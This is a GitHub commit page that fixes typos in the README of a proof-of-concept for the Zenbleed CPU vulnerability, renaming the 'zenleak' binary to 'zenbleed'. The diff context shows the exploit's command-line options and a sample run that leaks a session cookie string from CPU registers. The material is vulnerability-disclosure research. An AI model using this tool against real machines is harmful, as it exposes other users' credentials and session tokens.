-
Notifications
You must be signed in to change notification settings - Fork 411
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
pocs/cpus/zenbleed: Update README.md (#42)
Bunch of typos.... zenbleed/zenleak
- Loading branch information
Showing
1 changed file
with
3 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -90,7 +90,7 @@ ZenBleed Testcase -- [email protected] | |
NOTE: Try -h to see configuration options | ||
Usage: ./zenleak [OPTIONS] | ||
Usage: ./zenbleed [OPTIONS] | ||
-v N Select a variant leak kernel, different kernels work better on different SKUs. | ||
-m N Stop after leaking N values, useful for benchmarking. | ||
-H N Spawn a 'hammer' thread on core N, produces recognizable values for testing. | ||
|
@@ -112,7 +112,7 @@ For example, a command like `while true; do sort < /etc/passwd > /dev/null; done | |
This should generate some recognizable register throughput, like this: | ||
|
||
``` | ||
$ ./zenleak | ||
$ ./zenbleed | ||
Thread 0x7f26b92346c0 running on CPU 0 | ||
Thread 0x7f26b8a336c0 running on CPU 2 | ||
Thread 12: "999:999:systemd " | ||
|
@@ -169,7 +169,7 @@ registers for a string that looks like that. As it learns more of the string | |
that follows, it will extend the search to continue the pattern. | ||
|
||
``` | ||
$ ./zenleak -q -p "SID=" | ||
$ ./zenbleed -q -p "SID=" | ||
SID=cieX4meceechoo2UThooh5uu; 1P_JAR=2023-05-17-21; S^C | ||
``` | ||
|
||
|